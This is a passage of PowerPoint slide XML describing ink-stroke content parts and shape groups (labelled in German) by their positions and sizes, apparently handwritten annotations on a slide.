              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7364446" y="2699594"/>
                <a:ext cx="31320" cy="140040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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5446" y="2690594"/>
                  <a:ext cx="4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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7445806" y="2734514"/>
                <a:ext cx="82080" cy="88200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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37166" y="2725874"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7488286" y="2730194"/>
                <a:ext cx="129960" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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79286" y="2721194"/>
                  <a:ext cx="147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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7577566" y="2658194"/>
                <a:ext cx="8280" cy="18360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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68926" y="2649554"/>
                  <a:ext cx="2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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7634806" y="2704994"/>
                <a:ext cx="133560" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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5806" y="26963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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7778086" y="2699954"/>
                <a:ext cx="133920" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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69086" y="2690954"/>
                  <a:ext cx="15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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7950166" y="2577554"/>
                <a:ext cx="7200" cy="186120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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1166" y="2568914"/>
                  <a:ext cx="24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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7868806" y="2655674"/>
                <a:ext cx="136080" cy="11880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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59806" y="2646674"/>
                  <a:ext cx="15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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8125126" y="2661074"/>
                <a:ext cx="121680" cy="169920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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16126" y="2652434"/>
                  <a:ext cx="139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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8295046" y="2679434"/>
                <a:ext cx="73800" cy="5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86406" y="2670434"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8361286" y="2671874"/>
                <a:ext cx="23760" cy="72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2646" y="2663234"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8435086" y="2669354"/>
                <a:ext cx="78120" cy="493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26086" y="2660714"/>
                  <a:ext cx="9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28520" cy="155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2486" y="2643434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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8609686" y="2580074"/>
                <a:ext cx="70200" cy="1569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0686" y="2571074"/>
                  <a:ext cx="8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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8667646" y="2678354"/>
                <a:ext cx="101160" cy="604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9006" y="2669714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8803366" y="2672954"/>
                <a:ext cx="97920" cy="802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94726" y="2664314"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8927566" y="2686634"/>
                <a:ext cx="11520" cy="748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18926" y="2677634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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8953846" y="2673674"/>
                <a:ext cx="127080" cy="770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45206" y="2665034"/>
                  <a:ext cx="144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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9109726" y="2557754"/>
                <a:ext cx="43200" cy="178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1086" y="2548754"/>
                  <a:ext cx="608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BA5B70B-C698-45F4-9C76-AB4D89C347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7438480" y="1465638"/>
            <a:ext cx="171000" cy="128880"/>
            <a:chOff x="7081126" y="2684834"/>
            <a:chExt cx="1710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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7081126" y="2684834"/>
                <a:ext cx="105120" cy="126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2486" y="2675834"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7245286" y="2800754"/>
                <a:ext cx="6840" cy="12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6286" y="2792114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uppieren 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C573F4E-EF79-4D61-8FC6-13F9F5B4B4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3384286" y="1231998"/>
            <a:ext cx="1951560" cy="692280"/>
            <a:chOff x="3384286" y="2451194"/>
            <a:chExt cx="195156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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3485086" y="2800394"/>
                <a:ext cx="1767600" cy="28368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6446" y="2791754"/>
                  <a:ext cx="178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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5098966" y="2873474"/>
                <a:ext cx="236880" cy="270000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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9966" y="2864834"/>
                  <a:ext cx="254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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3384286" y="2604194"/>
                <a:ext cx="132120" cy="199800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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5286" y="2595194"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3613246" y="2743514"/>
                <a:ext cx="4320" cy="6840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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04246" y="2734874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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3690646" y="2577914"/>
                <a:ext cx="43200" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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82006" y="2568914"/>
                  <a:ext cx="6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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3656446" y="2530754"/>
                <a:ext cx="176040" cy="191520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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7806" y="2521754"/>
                  <a:ext cx="193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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3884686" y="2580074"/>
                <a:ext cx="74160" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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6046" y="257107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3981526" y="2581514"/>
                <a:ext cx="123480" cy="70920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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2886" y="2572874"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4137406" y="2528234"/>
                <a:ext cx="112680" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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8406" y="2519594"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4290406" y="2521034"/>
                <a:ext cx="79560" cy="84960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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81406" y="2512394"/>
                  <a:ext cx="9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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377166" y="2539034"/>
                <a:ext cx="113040" cy="80640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68166" y="253039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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4551766" y="2451194"/>
                <a:ext cx="225360" cy="194400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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43126" y="2442554"/>
                  <a:ext cx="243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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4598566" y="2558474"/>
                <a:ext cx="109080" cy="19800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89566" y="2549834"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4809166" y="2547314"/>
                <a:ext cx="109800" cy="169200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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0166" y="2538314"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4931926" y="2571794"/>
                <a:ext cx="132120" cy="151560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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23286" y="2562794"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5017246" y="2702474"/>
                <a:ext cx="11520" cy="6480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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8246" y="2693834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uppieren 1153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC7B641-B3E1-4C34-9BE8-1B6E5DED0EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3453406" y="2163678"/>
            <a:ext cx="1801080" cy="264240"/>
            <a:chOff x="3453406" y="3382874"/>
            <a:chExt cx="18010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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3508486" y="3419594"/>
                <a:ext cx="1746000" cy="227520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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99486" y="3410954"/>
                  <a:ext cx="1763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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3453406" y="3382874"/>
                <a:ext cx="264240" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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44406" y="3374234"/>
                  <a:ext cx="281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C71BDADD-765D-4DED-B435-D99857DE7324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3454846" y="2405238"/>
            <a:ext cx="2040120" cy="342000"/>
            <a:chOff x="3454846" y="3624434"/>
            <a:chExt cx="20401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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3454846" y="3668354"/>
                <a:ext cx="131400" cy="247320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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45846" y="3659714"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3640246" y="3900194"/>
                <a:ext cx="360" cy="2520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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31606" y="38911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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3706126" y="3784634"/>
                <a:ext cx="28440" cy="150840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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97486" y="3775634"/>
                  <a:ext cx="46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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3683086" y="3714794"/>
                <a:ext cx="210960" cy="165600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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4086" y="3705794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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912046" y="3813074"/>
                <a:ext cx="128160" cy="107280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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03406" y="3804074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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4015366" y="3754034"/>
                <a:ext cx="83160" cy="177120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06366" y="3745034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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4139926" y="3851954"/>
                <a:ext cx="59400" cy="81360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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31286" y="3842954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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4241446" y="3873914"/>
                <a:ext cx="27360" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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2806" y="3865274"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4226326" y="3779594"/>
                <a:ext cx="19440" cy="31680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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7686" y="3770594"/>
                  <a:ext cx="37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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4282126" y="3865994"/>
                <a:ext cx="83880" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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73126" y="3856994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377526" y="3852314"/>
                <a:ext cx="85680" cy="96480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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8526" y="3843314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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4487326" y="3826034"/>
                <a:ext cx="111600" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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78326" y="3817034"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4714846" y="3786794"/>
                <a:ext cx="27720" cy="164160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06206" y="3777794"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4695406" y="3724154"/>
                <a:ext cx="125640" cy="113040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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6766" y="3715154"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4803766" y="3836834"/>
                <a:ext cx="132120" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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94766" y="3828194"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4955326" y="3810554"/>
                <a:ext cx="89280" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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6686" y="3801914"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5044606" y="3714434"/>
                <a:ext cx="54720" cy="159840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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35606" y="3705434"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5102926" y="3786794"/>
                <a:ext cx="70560" cy="53280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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93926" y="3778154"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5211286" y="3749354"/>
                <a:ext cx="101160" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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02646" y="3740714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5316046" y="3706514"/>
                <a:ext cx="109080" cy="93600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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7406" y="3697874"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5339446" y="3624434"/>
                <a:ext cx="155520" cy="153000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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30446" y="3615434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2" name="Gruppieren 1151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA7DEBB-69B3-4AEF-8FA2-4E1D5B9AF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905766" y="2674518"/>
            <a:ext cx="796320" cy="438840"/>
            <a:chOff x="1905766" y="3893714"/>
            <a:chExt cx="7963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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1927366" y="3893714"/>
                <a:ext cx="662040" cy="188640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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18726" y="3884714"/>
                  <a:ext cx="679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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2445406" y="3951314"/>
                <a:ext cx="256680" cy="109800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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6766" y="3942314"/>
                  <a:ext cx="27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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1933486" y="4111874"/>
                <a:ext cx="678600" cy="220680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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24486" y="4102874"/>
                  <a:ext cx="69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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1905766" y="4185314"/>
                <a:ext cx="183240" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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96766" y="4176674"/>
                  <a:ext cx="200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1" name="Gruppieren 1150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D186CA7A-2A92-46D2-BA6B-7E5E81E18832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1389518" y="3198749"/>
            <a:ext cx="1976040" cy="338400"/>
            <a:chOff x="1707406" y="4351994"/>
            <a:chExt cx="19760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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1707406" y="4406354"/>
                <a:ext cx="102240" cy="148680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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8406" y="4397714"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1828726" y="4491314"/>
                <a:ext cx="20880" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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9726" y="4482314"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1914046" y="4588514"/>
                <a:ext cx="11880" cy="14040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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05046" y="4579874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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2032126" y="4462514"/>
                <a:ext cx="21960" cy="120960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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23126" y="4453874"/>
                  <a:ext cx="39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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2010886" y="4417154"/>
                <a:ext cx="89640" cy="26640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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02246" y="4408514"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2034286" y="4534874"/>
                <a:ext cx="92880" cy="9360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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25646" y="4526234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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2067046" y="4585634"/>
                <a:ext cx="102600" cy="26280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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58046" y="4576994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2166046" y="4536674"/>
                <a:ext cx="105120" cy="73080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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57406" y="4528034"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2169646" y="4503914"/>
                <a:ext cx="101520" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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1006" y="4495274"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2298166" y="4492754"/>
                <a:ext cx="105120" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89166" y="4484114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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2406526" y="4483394"/>
